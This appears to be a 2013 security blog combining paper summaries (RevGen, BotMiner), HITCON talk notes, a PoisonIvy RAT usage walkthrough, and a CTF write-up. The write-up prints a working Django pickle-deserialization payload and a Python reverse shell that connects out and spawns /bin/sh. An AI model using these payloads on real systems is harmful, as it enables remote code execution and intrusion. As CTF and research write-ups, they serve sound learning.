Friday, August 23, 2013

Paper Reading: Enabling Sophisticated Analyses of x86 Binaries with RevGen

This paper was published at HotDep'11.
It aims to ease binary analysis with RevGen, which translates traditional x86 binaries into LLVM IR instead of the ad-hoc IRs used by different analysis systems.

There are many different systems for binary program analysis, for example BitBlaze and CodeSurfer. However, each uses its own IR language, which is hard to migrate to other systems and lacks formal verification.

LLVM, a popular compiler framework, has been widely used in many analysis tools. For example,
KLEE and Parfait are both LLVM-based.

LLVM

LLVM is a compiler framework with a compact RISC-like instruction set. It supports an unlimited number of registers and contains only about 30 opcodes, which eases analysis. In particular, only load and store can access memory.
LLVM natively uses a Static Single Assignment (SSA) code representation, so data flow and def-use graphs can be computed. Moreover, function inlining, constant propagation and dead store removal can also be performed.
To translate binary code into LLVM, the following issues must be addressed:
  • pointer arithmetic
  • accommodating different stack layouts
  • transforming accesses to various code and data segments
  • dealing with indirect calls
  • producing semantically equivalent LLVM programs.

Challenges

  1. Extracting the binary code's semantics
  2. Inferring type information

RevGen




Translating Blocks of Binary Code

1. Disassemble the binary into micro-operations, which are later translated into LLVM instructions.
2. There is a one-to-one mapping between micro-operations and LLVM instructions.

Reconstructing the Control Flow Graph (CFG)

1. Each code block is translated into an LLVM basic block, and the blocks are grouped into functions.
2. The functions are connected with call instructions.

Obtaining Analyzable LLVM Programs

In this step, the symbol table (which contains the library calls) and the relocation table are used to identify constant addresses. Then the translation can be completed.
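As an added illustration (my own code, not RevGen's), the following Python sketch shows the two translation steps above on one x86 block: micro-operations in the TCG style are mapped one-to-one to LLVM IR lines, registers are reached only through load/store on an assumed CPU-state struct (pointers such as %env_eax are assumed to be computed once per function), and temporaries are renamed so the output is in SSA form.

```python
# Added illustration of the RevGen pipeline; not the project's own code.
# Each micro-op becomes exactly one LLVM IR instruction, and CPU registers are
# read and written only via load/store on an assumed CPU-state struct.

def reg_ptr(reg):
    # Assumed convention: one i32* per register field, e.g. %env_eax, obtained
    # once per function by getelementptr on the CPU-state struct (not shown).
    return "%env_" + reg

def translate_block(micro_ops):
    """Return one LLVM IR line per micro-op, renaming temporaries into SSA form."""
    ir, ver = [], {}
    def cur(t):                      # current SSA name of temporary t
        return "%%%s_%d" % (t, ver[t])
    def fresh(t):                    # new SSA version: a name is never assigned twice
        ver[t] = ver.get(t, -1) + 1
        return cur(t)
    for op in micro_ops:
        kind = op[0]
        if kind == "ld_reg":         # tmp <- register: a load from the CPU state
            _, tmp, reg = op
            ir.append("%s = load i32, i32* %s" % (fresh(tmp), reg_ptr(reg)))
        elif kind == "st_reg":       # register <- tmp: a store to the CPU state
            _, reg, tmp = op
            ir.append("store i32 %s, i32* %s" % (cur(tmp), reg_ptr(reg)))
        elif kind in ("add_i32", "sub_i32", "xor_i32"):
            _, dst, a, b = op
            lhs, rhs = cur(a), cur(b)          # read operands before renaming dst
            ir.append("%s = %s i32 %s, %s" % (fresh(dst), kind[:3], lhs, rhs))
        else:
            raise ValueError("unsupported micro-op: " + kind)
    return ir

# Constructed micro-op sequence for the x86 instruction `add eax, ebx`.
ADD_EAX_EBX = [("ld_reg", "t0", "eax"), ("ld_reg", "t1", "ebx"),
               ("add_i32", "t0", "t0", "t1"), ("st_reg", "eax", "t0")]

if __name__ == "__main__":
    print("\n".join(translate_block(ADD_EAX_EBX)))
```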

Paper Reading: BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection

BotMiner was proposed at USENIX '08 by the College of Computing, Georgia Institute of Technology.
In this paper, the authors aim to detect C&C botnets without a priori knowledge. The key idea is to cluster malicious activities and communication traffic separately and then mine the relation between the two. Their system achieves a good detection rate in their evaluation.

Introduction

In this section, the authors introduce the current state of botnets. Their classification of botnets is listed below.
IRC botnets, including
P2P botnets, including Nugache and Storm/Peacomm

Related Work

Most related work is specific to the IRC and HTTP protocols, which are the most widely used by C&C botnets. This paper proposes a system that detects C&C communication over arbitrary protocols.

Definition and Assumption

The authors define a botnet as "A coordinated group of malware instances that are
controlled via C&C channels". That is, a bot must unavoidably communicate with other bots or a bot server, and it must carry out some malicious activities.

Proposed Scheme

The architecture of BotMiner is shown in the figure.
In order to detect bots in a network, BotMiner follows two observations, "who is talking to whom" and "who is doing what". Therefore the system is divided into a C-plane and an A-plane.
  • The C-plane is responsible for communication.
    The C-plane monitor uses hardware support (Cisco, Juniper) to log network traffic.
  • The A-plane is responsible for activities.
    Snort with the SCADE (Statistical sCan Anomaly Detection Engine) plugin is used to implement the A-plane monitor.
In C-plane clustering, noise connections and whitelisted connections are first filtered out. Then two-level clustering is performed, from coarse-grained to fine-grained, on the following aggregate attributes:
  1. the number of flows per hour (fph)
  2. the number of packets per flow (ppf)
  3. the average number of bytes per packet (bpp)
  4. the average number of bytes per second (bps)
After these features are computed, X-means, a K-means variant, is used to cluster in different feature spaces for the coarse-grained and fine-grained stages. X-means can cluster without a predefined number of clusters: it runs multiple rounds of K-means and picks the proper number of clusters with the help of the Bayesian Information Criterion. A similar approach is used in A-plane clustering.

Finally, the clusters from both planes are cross-checked to find intersections, which indicate the existence of a botnet.
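The following added example (my own, not the BotMiner authors' code) computes the four C-plane attributes from a constructed one-hour flow log, groups hosts with identical rounded feature vectors as a stand-in for X-means, and then performs the cross-plane check against constructed A-plane alerts; the flow records, hosts and activity labels are all made up for the demo.

```python
from collections import defaultdict

# Constructed one-hour flow log (not from the paper): (src, dst, dport, packets, bytes, duration_s).
C2, WEB = "203.0.113.5", "198.51.100.7"
BOTS = ["10.0.0.11", "10.0.0.12", "10.0.0.13"]
FLOWS = [(b, C2, 6667, 3, 180, 2.0) for b in BOTS for _ in range(12)]   # periodic C&C beacons
FLOWS += [("10.0.0.20", WEB, 80, p, p * 700, d) for p, d in [(10, 1.0), (40, 3.5), (25, 0.8)]]
# Constructed A-plane monitor output (Snort/SCADE-style alerts): activity -> hosts seen doing it.
A_CLUSTERS = {"scan": {"10.0.0.11", "10.0.0.12", "10.0.0.30"}, "spam": {"10.0.0.13"}}

def c_plane_features(flows, hours=1.0):
    """Per (src, dst, dport) pair: the C-plane attributes fph, ppf, bpp, bps from the text."""
    groups = defaultdict(list)
    for src, dst, dport, pkts, byts, dur in flows:
        groups[(src, dst, dport)].append((pkts, byts, dur))
    feats = {}
    for key, fl in groups.items():
        n = len(fl)
        pkts, byts = sum(p for p, _, _ in fl), sum(b for _, b, _ in fl)
        bps = sum(b / max(d, 1e-3) for _, b, d in fl) / n      # mean bytes/second over flows
        feats[key] = (n / hours, pkts / n, byts / pkts, bps)
    return feats

def c_plane_clusters(feats):
    """Stand-in for X-means: hosts whose rounded feature vectors coincide form one cluster."""
    buckets = defaultdict(set)
    for (src, _dst, _dport), v in feats.items():
        buckets[tuple(round(x, 1) for x in v)].add(src)
    return list(buckets.values())

def cross_plane_correlate(c_clusters, a_clusters, min_size=2):
    """Hosts sharing both a C-plane and an A-plane cluster: the intersection BotMiner reports."""
    found = []
    for c in c_clusters:
        for activity, hosts in a_clusters.items():
            both = c & hosts
            if len(both) >= min_size:
                found.append((activity, frozenset(both)))
    return found

if __name__ == "__main__":
    print(cross_plane_correlate(c_plane_clusters(c_plane_features(FLOWS)), A_CLUSTERS))
```

Hosts that only scan (10.0.0.30) or only share a communication pattern (10.0.0.13) are not reported; the report needs both planes to agree.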

Friday, August 16, 2013

HITCON 2013 Session Summary : Advance Malware Evasion And Hiding Techniques

This session was given at HITCON 2013 by Chong Rong Hwa from FireEye.

Attack Vector

In this session, three types of infection vectors are discussed first:
  1. Physical, such as USB
  2. Email
    Compression, encryption, password-protected compression
  3. Web
    Watering hole attacks, where the attacker compromises a legitimate website to host a malicious page.
    ex. On May 1, 2013, attackers compromised the US Department of Labor website to host a PoisonIvy backdoor.

APT Advanced Malware

This malware does not use advanced techniques but disguises itself as a normal program or user.

Attackers may use old vulnerabilities but slightly change the exploit code to hinder analysis:
    Add invalid characters to the RTF file to confuse the parser
    Replace part of the shellcode with semantically equivalent instructions

Store non-malicious code on disk and construct the malicious payload in memory:
    Trojan.APT.BaneChant

Employ commonly used encryption (or signature) algorithms with slight changes (ex. DES, AES)
Use public and legitimate services for malicious behavior, such as Google Drive and Amazon AWS:
    Trojan.APT.Seinup
Anti-VM
   Detect human behavior

APT Attack Source

APT attacks do not come from a single source, and the control servers are distributed over the world.
      Asia and Eastern Europe are the two main source regions for APT attacks.
      Most APT tools are made in China, ex. Gh0stRAT.

Thursday, August 15, 2013

HITCON 2013 Overview


Cyber War

  1. People's Republic of Cyber Warfare: Comparing China, Iran & Russia's Militarization of Cyberspace (駭客人民共和國: 中國伊朗跟俄羅斯網軍的分析與比較)
  2. Global Cyber Espionage and Chinese Hacker Threats, Internet Surveillance and PRISM (全球間諜:互聯網監控全球趨勢 棱鏡門與中國駭客威脅論)
  3. APT1: Technical Backstage (APT1: 反攻網軍後台)
  4. How South Korea Makes White-hat Hackers (南韓如何培養白帽駭客?)
  5. How does Japan deal with Targeted Attacks and SCADA Security (目標鎖定攻擊與工控系統安全:日本如何應對兩大趨勢)
Cyber war is the main topic of HITCON 2013, so many sessions about global cyber activity are included.
The first two presentations talk about national cyber-war power, covering China, Iran and Russia, and also mention Chinese hackers and Internet surveillance by the U.S.
Second, Paul Rascagneres from malware.lu shares his experience tracking the APT1 hackers, who probably come from China.
Then the national strategies of Japan and Korea, two countries near Taiwan, are discussed.

APT

  1. APT defense from the view of security architecture(從系統設計建置面談 APT 防禦)
  2. Visual Data Analytics - Graphing your Indicators(APT 特徵的視覺資料分析法)
  3. Digital Eagle Eye System: Use Cyber Intelligence against APT Attacks(數位鷹眼系統: 以網路數位情資對抗 APT 攻擊)
  4. APT Cyber Shuttle: From Automated Analysis to TTP Observation(APT網際飛梭:從自動化分析到拆解 APT 後台駭客活動)
  5. Light & Shadow about Banking $ecurity @Japan(光與影 日本銀行業的資訊安全)
At HITCON 2013, APT is still one of the hottest topics. These sessions discuss management and strategy against APT, and some forensics techniques for facing APT attacks are also proposed.
Note that the session "APT Cyber Shuttle: From Automated Analysis to TTP Observation" by Xecure-Lab & Academia Sinica will also be presented at Black Hat USA 2013.

Malware

  1. Building new weapons for malware analysts(建立惡意軟體分析的新武器)
  2. Advance Malware Evasion and Hiding Techniques(惡意軟體的進階免殺技巧)
  3. Static Analysis and Dynamic Instrumentation for Intelligent Exploit Analysis(靜態與動態智慧型漏洞文件分析系統)
Malware analysis is a long-discussed problem, and this year some sessions about malware are included as well.

Mobile


  1. Escaping Android Dynamic Analysis; Chinese New Year Train Ticket Ordering Day(逃離安卓動態檢測 & 訂票助手一日談)
  2. Dex Education 201: Anti-Emulators(深入Dalvik Dex教學:反制模擬器)
  3. Android Hooking Attack
  4. Review of Security Vulnerabilities on the Android Platform(Android平臺安全性漏洞回顧)
  5. GSM Security Research using Open Source Tools (以開源軟體進行GSM安全研究)

With the exponential growth in mobile device usage, sessions about mobile are also increasing. The first two sessions discuss how malware evades security analysis mechanisms. The following two sessions are about techniques employed by malware. In particular, "Review of Security Vulnerabilities on the Android Platform", presented by 肖梓航 Claud, which overviews this year's Android vulnerabilities, is worth reading.

Exploit & Vulnerability


  1. Life of Coder: The adventure through the landscape of bugs(程序員的蟲洞漂流)
  2. Analysis on the EPATHOBJ Exploit(請謹慎編碼,哪怕它只是一句錯誤處理— 來自 win32k!EPATHOBJ::pprFlattenRec 漏洞的啟示)
  3. Killing AV in x64(戳戳防毒軟體死穴)
  4. 0-Day Easy Talk - Happy Fuzzing Internet Explorer(0-Day 輕鬆談 - Happy Fuzzing Internet Explorer)
  5. How can i have 100 0day for just 1day(超級祕訣 - 一天擁有 100 個 0day!)
  6. Exploiting JRE (JRE安全机制与漏洞挖掘研究)
Exploits and vulnerabilities are an interesting topic this year, and a 0-day sharing activity is also included in this year's HITCON.
In the first three sessions, the authors analyze some known exploits and share their implementations. In the fourth session, the author demonstrates the 0-day he found and shares his experience.
The fifth talk presents an idea for fuzzing numerous applications at once. The last session summarizes current Java vulnerabilities and directions for fuzzing the Java platform.

Others


  1. The undisclosed files of incidents by the data scientist(資料科學家未曾公開之資安研究事件簿)
  2. OS X Rootkits Stuff(那些洞,我們一起追的 OS X Rootkits)
  3. Spears and shields on online game(線上遊戲矛盾大對決)
  4. Breaking image CAPTCHA for fun(CAPTCHA 好好玩)
  5. Protocol and physical analysis of EMV POS devices.(EMV晶片卡POS裝置的實體與溝通協定分析)
  6. Browser and Local Zone(瀏覽器和本地域)
The session "The undisclosed files of incidents by the data scientist" talks about some research topics of Professor 陳昇瑋; social networks and malicious phone calls are both special and interesting topics.
Also, while web security was widely discussed at Black Hat 2013, there are fewer topics about web security in this year's HITCON.

Sunday, August 11, 2013

CVE-2013-1763 : Local Privilege Escalation Vulnerability

This vulnerability was published in February; it lets a normal user gain superuser privileges. Ubuntu 12.x is vulnerable, so I downloaded the PoC code and tested it. The result was successful.

Formal Verification for Cryptography Protocols

At this year's S&P conference, Microsoft and INRIA presented the paper "Implementing TLS with Verified Cryptographic Security." In this paper, an F# TLS library was implemented and a series of formal proofs was also given. To understand their work, some background knowledge is necessary. After some searching, the slides published at ETAPS'12 are the most accessible document, so in this article I will summarize those slides.

Attack Model

The attack model is communication in an insecure network environment, as in the following figure.


  • The attacker can intercept all messages sent on the network
  • He can compute messages
  • He can send messages on the network
The term cryptographic primitives means the basic cryptographic functions that are later used to build security protocols.

Symbolic Model and Computational Model 

                           Symbolic Model                           Computational Model
Cryptographic primitives   black boxes                              functions on bitstrings
Messages                   terms over cryptographic primitives      bitstrings
Attacker capability        computes with cryptographic primitives   probabilistic polynomial-time Turing machine
Security assumptions       verify what the attacker can do          verify what the attacker cannot do

Verifying Protocols in the Symbolic Model

The basic idea is to compute the attacker's knowledge: enumerate all combinations of cryptographic primitives and check whether any of them violates the security policy. Clearly these combinations can be infinite, so the problem can be undecidable; techniques such as approximation, restriction to a proper subset, or termination conditions are therefore used.
For example, Horn clauses can be used to verify protocols in the symbolic model. With the predicate
                                             attacker(M) meaning "the attacker may have M"
two kinds of clauses are introduced:
       Constructor f(m1, m2, m3, ..., mn)
              attacker(m1) ∧ attacker(m2) ∧ ... ∧ attacker(mn) → attacker(f(m1, m2, ..., mn))
       Destructor g(m1, m2, ..., mn) → m
              attacker(m1) ∧ attacker(m2) ∧ ... ∧ attacker(mn) → attacker(m)
       Example (symmetric encryption)
              attacker(m) ∧ attacker(k) → attacker(sencrypt(m, k))
              attacker(sencrypt(m, k)) ∧ attacker(k) → attacker(m)
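As an added example (my own code, not from Blanchet's slides or ProVerif), the following Python computes the attacker's knowledge as the closure of the observed terms under exactly the two sencrypt clauses above; a depth bound on constructed terms stands in for the approximation that makes the search terminate, and the protocol traces are constructed for the demo.

```python
from itertools import product

# Terms are strings (atomic names) or tuples ("sencrypt", m, k). The attacker's
# knowledge is saturated under the constructor and destructor Horn clauses for
# symmetric encryption; a depth bound keeps the set of constructed terms finite.

def depth(term):
    return 0 if isinstance(term, str) else 1 + max(depth(t) for t in term[1:])

def saturate(observed, max_depth=2):
    """Smallest set containing `observed` and closed under both clauses up to max_depth."""
    known = set(observed)
    while True:
        derived = set()
        for m, k in product(known, repeat=2):
            # constructor: attacker(m) ∧ attacker(k) → attacker(sencrypt(m, k))
            enc = ("sencrypt", m, k)
            if depth(enc) <= max_depth:
                derived.add(enc)
            # destructor: attacker(sencrypt(m, k)) ∧ attacker(k) → attacker(m)
            if isinstance(m, tuple) and m[0] == "sencrypt" and m[2] == k:
                derived.add(m[1])
        if derived <= known:            # fixpoint: nothing new can be derived
            return known
        known |= derived

def attacker_knows(observed, goal, max_depth=2):
    """Does `goal` become derivable from the messages the attacker observed?"""
    return goal in saturate(observed, max_depth)

if __name__ == "__main__":
    # Constructed traces: the secret sent under k; then k additionally wrapped under a leaked kmaster.
    print(attacker_knows({("sencrypt", "secret", "k")}, "secret"))                        # False
    print(attacker_knows({("sencrypt", "secret", "k"),
                          ("sencrypt", "k", "kmaster"), "kmaster"}, "secret"))           # True
```

The second trace needs two applications of the destructor clause (first to recover k, then the secret), which the fixpoint loop finds without any protocol-specific search.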

Verifying Protocols in the Computational Model

There are three strategies for verification in the computational model:
  1. Linking the symbolic and the computational models
    First, prove the property in the symbolic model and establish a computational soundness result; then the protocol is also proven secure in the computational model.
  2. Adapting techniques from the symbolic model
    Some symbolic techniques can also be adapted to the computational model.
  3. Direct computational proofs
    Proofs in the computational model are typically proofs by sequences of games.

References

  1. Bruno Blanchet's presentation slides (1)
    http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11intro.pdf
  2. Bruno Blanchet's presentation slides (2)
    http://www.mpi-inf.mpg.de/vtsa11/slides/blanchet/VTSA11proverif.pdf
  3. Bruno Blanchet's presentation slides (3)
    http://cs.ioc.ee/etaps12/invited/blanchet-slides.pdf



Thursday, August 8, 2013

PoisonIvy Remote Administration Tool

In this article, I will talk about PoisonIvy and demonstrate its usage.
PoisonIvy is a remote administration tool that is widely used by hackers as a backdoor.
There have been some news reports about PoisonIvy:

Usage Demonstration

In the PoisonIvy Server Profile, we can configure the server.

In this tab, the address and password can be set. Proxy attributes can also be set here.
The next tab, Install, is used to configure how the backdoor starts up; settings such as autostart and the executable name are included.

Some advanced attributes such as process injection, persistence and a key logger are also available.
After generation, a backdoor executable is produced. Then we create the corresponding client and execute the backdoor on another machine.
After a successful infection, a message is shown, and we can see some basic information about the victim.

Then we can retrieve some system information about the victim's machine.


In the next step, we can create a remote shell on the victim.

Moreover, we can also get the victim's remote desktop.



HITCON 2013 Write Up: Pwned 500

In this problem, a Django website was given, with its source code available here. Browsing all the files in the repo, we can find two interesting things in settings.py.
  1. The session engine is "django.contrib.sessions.backends.signed_cookies"
  2. The SECRET_KEY is also provided in the source code.
When signed_cookies is used, every cookie with a sessionid field is treated as serialized data, and pickle is used to deserialize it. The pickle library is unsafe as soon as the data is not limited to ordinary types. So we can follow the document here and complete the attack process. Note that the referenced document also provides reference code that is worth reading.
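From the defender's side, the two findings above combine into one lesson: a cookie signature only proves who wrote the cookie, and once SECRET_KEY is in the repository anyone can write one, so the deserializer must be safe on its own. The added example below (my own code, not Django's and not the CTF's) shows a simplified HMAC-signed cookie, a JSON decoder, and a restricted unpickler that refuses every global lookup, which is exactly what a __reduce__ payload needs; the key, cookie format and ReduceProbe class are constructed for the demo.

```python
import base64, hashlib, hmac, io, json, pickle

SECRET_KEY = b"constructed-demo-key"   # stands in for settings.SECRET_KEY; not a real key

class SafeUnpickler(pickle.Unpickler):
    """Plain session data (str, int, list, dict) never needs a global lookup, while a
    __reduce__ payload must import a callable (e.g. builtins.eval): refuse all of them."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError("refusing global %s.%s in session data" % (module, name))

def safe_loads(data):
    return SafeUnpickler(io.BytesIO(data)).load()

def sign(data):
    """cookie = base64(data):base64(HMAC-SHA256(SECRET_KEY, data)); simplified stand-in for Django's signer."""
    mac = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return "%s:%s" % (base64.urlsafe_b64encode(data).decode(), base64.urlsafe_b64encode(mac).decode())

def verify(cookie):
    """Return the signed bytes, or raise ValueError if the MAC does not match."""
    data_b64, mac_b64 = cookie.split(":")
    data = base64.urlsafe_b64decode(data_b64)
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, base64.urlsafe_b64decode(mac_b64)):
        raise ValueError("bad cookie signature")
    return data

def load_session(cookie, serializer="json"):
    """Signature check first, then decoding. With a leaked key the signature check passes for
    attacker-made cookies, so only the choice of decoder (JSON or restricted pickle) protects the server."""
    data = verify(cookie)
    return json.loads(data) if serializer == "json" else safe_loads(data)

class ReduceProbe:
    """Harmless stand-in for a __reduce__ payload: plain pickle.loads would call len('x')."""
    def __reduce__(self):
        return (len, ("x",))

if __name__ == "__main__":
    print(load_session(sign(pickle.dumps({"user": "alice"})), "pickle"))   # normal session data
    try:
        load_session(sign(pickle.dumps(ReduceProbe())), "pickle")          # validly signed, still refused
    except pickle.UnpicklingError as e:
        print("blocked:", e)
```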

With the following Python 2 code, we can convert connback.py into pickle format; the program is invoked as soon as pickle.loads() is called to deserialize it.
import pickle
from base64 import b64encode as b64

code = b64(open('connback.py').read())   # the reverse-shell script, base64-encoded into the payload string

class ex(object):
    # __reduce__ tells pickle to reconstruct this object by calling eval(...) on the given string,
    # which decodes and executes the embedded script during deserialization.
    def __reduce__(self):
        return ( eval, ('str(eval(compile("%s".decode("base64"),"q","exec"))).strip("None")'%(code),) )
payload = pickle.dumps(ex())

And we can prepare a reverse shell as follows (connback.py, Python 2; host and port hold the listener address and are not defined in this excerpt):
import os
import socket
import subprocess

socket.setdefaulttimeout(60)
sok = None
try:
    sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sok.connect((host,port))
    sok.send('!P0Wn! Congratulation !!\n')
    save = [ os.dup(i) for i in range(0,3) ]      # keep the original stdin/stdout/stderr
    os.dup2(sok.fileno(),0)                         # point the shell's standard streams at the socket
    os.dup2(sok.fileno(),1)
    os.dup2(sok.fileno(),2)
    shell = subprocess.call(["/bin/sh","-i"])
    [ os.dup2(save[i],i) for i in range(0,3)]       # restore the original descriptors afterwards
    [ os.close(save[i]) for i in range(0,3)]
    os.close(sok.fileno())
except Exception:
    pass

Finally, we start an nc listener for the reverse shell to connect to, and execute exploit.py to obtain the shell.
bletchley@Viking:~/WorkSpace/2013_Django/pwp-master$ python exploit.py '1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk' http://vuln-django.orange.tw
Sending payload, check you listenner